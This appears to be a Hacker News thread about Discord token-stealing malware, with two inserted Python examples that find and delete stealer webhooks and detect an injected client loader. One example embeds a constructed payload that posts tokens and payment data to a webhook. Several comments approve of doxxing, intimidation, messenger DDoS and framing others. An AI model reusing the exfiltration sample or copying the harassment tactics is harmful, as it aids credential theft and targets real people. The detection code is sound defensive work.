I did the same thing to someone who attacked my gf in high school. They got her with SubSeven which was extremely easy to remove. Rather than just erase it, I took a copy home with me and analyzed it. Running the strings command uncovered the SubSeven signatures. Turns out there was tooling that allowed you to modify the binary and redistribute it. Except the binary had an ICQ address to alert him to my gf’s online presence. He also had his AIM screen name, full name and city in his profile.
So I socially engineered him by posing as a classmate. I told him I was going to come by to get the homework for English. He wasn’t sure but I somehow convinced him and got his address. I don’t know why they always talk to strangers, but just like the article the dude responded. I got my friend and we went to pay him a visit.
Rang his doorbell, “hi is this l33th4x0r?”. He nodded but had no clue who I was. I mentioned my gf’s screen name and you could see the color leave his face. He stuttered and stammered about how he was just playing and didn’t mean to cause any problems. I said some stern words then left him wondering wtf I was and what just happened.
Kinda wish I saved the details (screen name, address, etc) just because of how epic it was at the time
I had fun with people on forums trying to get others to download keyloggers and the like. A lot of these were the stereotypical "script kiddies" who didn't know how much personal data they were giving away or even how the tools they used worked. I distinctly remember a few "C:\Documents and Settings\<uncommon first and last name>\...", from which I could find and sometimes phone them (often their parents would answer), but I drew the line at doing anything physical --- they were all far away anyway.
The most interesting results include apologies; one kid's father registered on the forum to post one for his son. Spamming a keylogger's logs with the physical address of its owner and "I know where you live" tends to cause them to repent in fear pretty quickly.
> I distinctly remember a few "C:\Documents and Settings\<uncommon first and last name>\...", from which I could find and sometimes phone them (often their parents would answer)
so this sounds like a pretty devious attack if you want to get someone, pose as a script kiddie in online forum, put in C:\Documents and Settings\<their first and last name> in stuff, other identifying info maybe and then let others do the work.
I used to just DDoS people’s AIM and messengers if they crossed me, as a phantom curse attached to them and they had no idea the cause.
I would chat with them as normal at the same time, chuckling to myself as they kept falling offline following a barrage of emoticons and requests from my army of chat bots that made their process run out of memory.
Eventually I’d bore of it. Or have one of the chatbots tell them not to cross someone again. In your scenario I probably would have said it was the person he got the exploit from, instead of making a link to someone I care about.
Way way back in the day, my friend wrote a program that would format the user's Commodore 5 1/4" floppy disk (usually the one that also ran their BBS) if they just tried to load it. They didn't even have to run it.
If someone screwed us, we'd create a new identity and upload a file named after a hot new pirated game to their BBS. Then sit back and watch the BBS go offline for a while.
Once in middle school, I wrote a fake format command and added it to autoexec.bat on my mom’s computer then promptly forgot about it because video games and sugar. Turns out she didn’t turn on her computer until Monday morning while I was at school. Mild mannered me was called to the principal’s office, expecting the worst. It was my mom on the phone frantically worried that her hard drive had just been nuked. I tell her what I did and she didn’t stop laughing for like 10 minutes. I was still grounded but I was allowed to use the computer or still play video games.
Niiiice, that reminds me of why I don’t pirate Windows disk images any more, they’re all compromised! The “slim” builds with a buncha stuff deleted and also preloaded was nice, but now they just steal crypto.
I was going to write it earlier but I was content with the statute of limitations so just bring it up when I run for office, it pretty much has nothing to do with what you believe
I wrote about what happened, it’s a different reaction than the person I replied to - who actually visited the person instead of calling the police - there was no prowess associated with my response, only that it was different and impersonal and also satisfactory, no more no less
Do you realize that if we’re talking about AIM and ICQ we are talking about 20 years ago? Maybe you didn't realize that, now that’s amusing. The sole purpose of this thread was “I can relate, I would approach it differently, here is a thing that happened”
> I am just saying you are regular busybody fucking asshole
I strongly believe this actually is language that goes against the CoC here on HN.
I think it would have had merit to reasonably talk about different points of view on the story, but any credibility goes down the drain in my book once people start not only to ad hominem others, but resort to language like you used.
Sad, as it could have been an interesting discussion to follow.
It's always PirateStealer, probably because it's open source so it's easy for people to pick up and use instead of exerting effort. Also, you can send a DELETE request to a Discord webhook without any auth, defusing the malware.
I'm still glad the DELETE thing works, I've reported a few times these with a complete writeup to Discord and all I got was a ticket being auto-closed after a month and the webhooks+servers still being up. I personally no longer bother reporting, just straight delete the webhook to stop the spread. Makes you wonder what their security/support team is doing with all those tickets.
They may not have one, or have one that’s so underwater with larger issues that the rest of the org doesn’t know how to route things to them.
Hiring for technical security is hard—you need engineering expertise to find good people, and then you need someone with an infosec background to vet them.
Finding a combination of both is surprisingly rare and you usually find infosec folks who can define but not implement a security program, or an engineer that can implement a security program with no idea how to run or grow it.
I need more peers in this space. If you’re reading this and are a software engineer looking for a transition please do reach out—email is in my profile. There’s a huge demand for security engineers and not nearly enough engineers interested in doing it.
That depends entirely on their backgrounds. I myself do not. The status-quo here isn’t too different than anywhere else in the tech sector.
Many security engineers transition into infosec from related fields like IT, DevOps, Network Engineering, Product Engineering, or similar. This tends to work out well since security engineers work closely with all of those areas within an organization.
Yes, you can send a DELETE to a Discord Webhook, but these malware projects have clocked on in most situations and now forward Webhooks through their own domains.
For the example of PirateStealer, the kid who made it ran a website where you posted your webhook and it spat out an exe that hid your webhook behind the domain, they even sold "premium" copies with additional security but in reality once they put the webhook behind their own domains they were dual-hooking, so the information was actually sent to 2 webhooks instead of just the 1.
Most of the services to create this malware now hide it behind a domain rather than directly exposing the Webhook, so shutting it down isn't as easy.
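An added example, not code from the thread or from any stealer project, that ties the two points above together: it pulls URLs out of a `strings` dump of a sample, separates real Discord webhooks (which the unauthenticated DELETE retires) from webhook-looking URLs on some other host (a relay the author controls, which Discord cannot delete for you), and builds the DELETE request. The dump, the webhook id/token and the `relay.example.net` host are all constructed placeholders; the Discord host list and the `/api/webhooks/<id>/<token>` path shape are the only facts assumed about Discord.

```python
import re
import urllib.request
from urllib.parse import urlparse

# Hosts Discord serves webhooks from. Anything else is a relay under the
# stealer author's control (the "dual-hooking" setup described above).
DISCORD_HOSTS = {"discord.com", "discordapp.com", "canary.discord.com", "ptb.discord.com"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Discord webhook path: /api/webhooks/<snowflake id>/<token>, optionally versioned.
WEBHOOK_PATH_RE = re.compile(r"^/api/(?:v\d+/)?webhooks/(\d{17,20})/([A-Za-z0-9_\-]{20,})/?$")


def classify_urls(dump: str) -> dict:
    """Split URLs in a strings dump into Discord webhooks (deletable without
    auth) and webhook-looking URLs on other hosts (relays; not deletable)."""
    found = {"discord": [], "relay": []}
    for m in URL_RE.finditer(dump):
        url = m.group(0).rstrip(".,;)")
        parts = urlparse(url)
        host = (parts.hostname or "").lower()
        path_match = WEBHOOK_PATH_RE.match(parts.path)
        if host in DISCORD_HOSTS and path_match:
            found["discord"].append(
                {"url": url, "id": path_match.group(1), "token": path_match.group(2)}
            )
        elif "webhook" in parts.path.lower():
            found["relay"].append(url)
    return found


def build_delete(url: str) -> urllib.request.Request:
    """The unauthenticated DELETE: possessing the URL (id + token) is the credential."""
    return urllib.request.Request(url, method="DELETE", headers={"User-Agent": "webhook-cleanup"})


def delete_webhook(url: str, opener=None) -> int:
    """Send the DELETE and return the HTTP status (Discord answers 204 on success).
    Not exercised offline; pass a custom opener to stub it out."""
    opener = opener or urllib.request.build_opener()
    with opener.open(build_delete(url), timeout=10) as resp:
        return resp.status


# Constructed sample of what `strings` might print for a stealer binary.
# The id and token are made up; relay.example.net is a placeholder host.
SAMPLE_DUMP = (
    "kernel32.dll\nGetProcAddress\n"
    "https://discord.com/api/webhooks/123456789012345678/" + "A1b2" * 17 + "\n"
    "https://relay.example.net/webhook/stage2\n"
    "https://example.com/\n"
)

if __name__ == "__main__":
    result = classify_urls(SAMPLE_DUMP)
    for hook in result["discord"]:
        print("deletable at Discord:", hook["url"])
    for relay in result["relay"]:
        print("relay, cannot be deleted at Discord:", relay)
```

Run it against `strings -n 12 sample.exe` output; only entries in the `discord` list are worth a DELETE, and a non-empty `relay` list is the signal that the sample is one of the proxied builds where the webhook is hidden behind the author's domain.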
Interesting article, but this type of malware has been spreading for months now. PirateStealer is definitely the most popular but it's been shut down a few times by a discord group who are targeting this type of malware.
One of the tools they've built is https://sketchy.tel/ which can decompile piratestealer/extrack/bby.rip and more and shuts down the Webhook automatically.
There's a lot of other things we do in this community but I can't disclose it because we never know who's reading our messages and if they get found out the malware creators will adapt to stop us.
You beat me to this. This malware is better than some of the work my colleagues can do, and they're being paid a lot of money. Even though it has bad intentions, it's still good software.
I feel like a script kiddie is someone that ripped off good code from others, maybe made a few adjustments at most, and claimed it as their own in an attempt to look cool
A misquote or an edit in the original comment occurred, as it now appears as: "Finding the author of most common malware isn't hard."
This assertion is different (i.e. Finding the author of [the majority of] malware isn't hard..., versus Finding the author of [the most popularly-used] malware isn't hard...).
I don't call the authors of most original malware skript kiddies, that term is for the people who copy the common malware with at most a few edits or create Frankenstein creations out of multiple common sources.
Malware detection relies on signatures and/or heuristics. Signatures won't work with a brand new malware that hasn't been seen before. Heuristics can also be defeated.
Antimalware is great for the low hanging fruit but don't expect it to detect something where the author has put effort into it.
As the maintainer of a moderately popular Minecraft mod, I deal with “ratted” versions all the time. They are often obfuscated with popular free tools that can be reversed, and they always seem to use Discord webhooks that can be instantly deleted. I’ve seen hundreds, and they never seem to evolve in their methods, though there have been some really nasty ones.
No, there's no direct API for that. What the malware does is inject javascript into your discord, so if you add any payment details to your account it will harvest the data and send it via the Webhook to the owner.
The injected code also will scan your friends for "rare" badges, like the Bot Developer, Early Supporter and Certified Moderator. They use this information to then target the malware to those people in the hopes they can sell the rare badge accounts.
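A check a practitioner would want after reading the two comments above, added here as an example and not taken from the thread or any project: the desktop client loads its core from a tiny `index.js` inside the `discord_desktop_core` module directory, and the injected harvesting code is commonly dropped into that file. The assumption made for this example is that the stock file is the single line `module.exports = require('./core.asar');`, so anything longer is tampered; the marker strings, the `demo()` directory layout and the sample payload are all constructed.

```python
import tempfile
from pathlib import Path

# Assumed stock content of discord_desktop_core/index.js: one require of core.asar.
STOCK_INDEX_JS = "module.exports = require('./core.asar');"

# Substrings that belong in a harvesting payload, not in a one-line loader.
SUSPICIOUS_MARKERS = ("webhook", "api/webhooks", "fetch(", "XMLHttpRequest", "payment", "token")


def audit_index_js(text: str) -> dict:
    """Return whether the loader deviates from stock and which markers it carries."""
    if text.strip() == STOCK_INDEX_JS:
        return {"tampered": False, "markers": []}
    lowered = text.lower()
    return {"tampered": True, "markers": [m for m in SUSPICIOUS_MARKERS if m.lower() in lowered]}


def scan_modules(root) -> list:
    """Walk a Discord install (or any tree) and audit every discord_desktop_core/index.js."""
    findings = []
    for path in sorted(Path(root).rglob("index.js")):
        if path.parent.name != "discord_desktop_core":
            continue
        result = audit_index_js(path.read_text(encoding="utf-8", errors="replace"))
        result["path"] = str(path)
        findings.append(result)
    return findings


# Constructed payload standing in for an injected loader: it still loads
# core.asar so the client keeps working, then hooks the client to exfiltrate.
SAMPLE_TAMPERED = (
    "module.exports = require('./core.asar');\n"
    "// injected\n"
    "const hook = 'https://discord.com/api/webhooks/000/xxx';\n"
    "fetch(hook, {method: 'POST', body: JSON.stringify({token: t, payment: p})});\n"
)


def demo() -> list:
    """Build a throwaway tree with one clean and one tampered module and scan it."""
    base = Path(tempfile.mkdtemp(prefix="discord-audit-"))
    clean = base / "1.0.9001" / "modules" / "discord_desktop_core-1" / "discord_desktop_core"
    bad = base / "1.0.9002" / "modules" / "discord_desktop_core-2" / "discord_desktop_core"
    for d in (clean, bad):
        d.mkdir(parents=True)
    (clean / "index.js").write_text(STOCK_INDEX_JS + "\n", encoding="utf-8")
    (bad / "index.js").write_text(SAMPLE_TAMPERED, encoding="utf-8")
    return scan_modules(base)


if __name__ == "__main__":
    for f in demo():
        print("TAMPERED" if f["tampered"] else "clean", f["path"], f["markers"])
```

Point `scan_modules` at the client's install directory (on Windows that is under `%APPDATA%\discord`) to check a real machine; because the payload keeps the original `require`, a plain "does the file still load core.asar" check would pass, which is why the audit compares against the whole stock file and not just its first line.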
I don't know the specifics, but I'd assume not, Discord has made big steps recently in stopping this sort of malicious activity by adding the "Report Spam" feature as well as creating their own phishing link database to help detect spam in private messages.
Discord knows it's a big issue and I'd hope they've attempted to mitigate the malware but there's no way to stop the actual injection, so really all they can do is code shuffle frequently to make the injected code redundant, but that'd rely on doing releases frequently and hoping everyone updates just as frequently.
I'm glad to hear they're taking things more seriously. They banned my original Discord account when I showed them a critical bug that allowed for remote viewing of another user's activity, both in real time and in logs.
Yeah, Discord is still just as bad with that.
If you join a server and find it's hosting illegal material and proceed to report the server, Discord will ban all members of that server, which includes you. It's created an environment in which no one wants to report anything to Discord, especially since if you appeal your ban you won't get unbanned as you were in the server.
I don't know what the redirect was but given the article is behind the Medium paywall, if it was a t.co redirect, it was probably the submitter's way to let everyone skip the paywall.
Our discord got hit by the same shit, targeted at our game admins.
We are the largest open source multiplayer video game on github, so (compromised) discord friends sending admins messages about "games they made" with exes in them was more effective than it should have been until news and announcements went out.
Why did you redact the identity of the scammer? Please name and shame them! These people need to be called out and it seems like you’ve got irrefutable proof.
These posts show up on every thread like this and it always strikes me as off. It's not that I think the scammer here deserves protection, but the impulse to "name and shame" makes me very uncomfortable.
I worry that supporting that impulse, even in cases like this, normalizes the use of internet lynch mobs to exact "justice" (for any subjective value of "justice" that can get enough steam).
Also it would be soo easy to frame someone. That is why we have the legal system we have in most countries. We want to be REALLY sure we get the right person before we do something about it.
Hey, I was not expecting a French speaker here :D Thanks for your comment ;) I'm just a beginner in malware analysis and I tried my best to give a starting point to people like me :)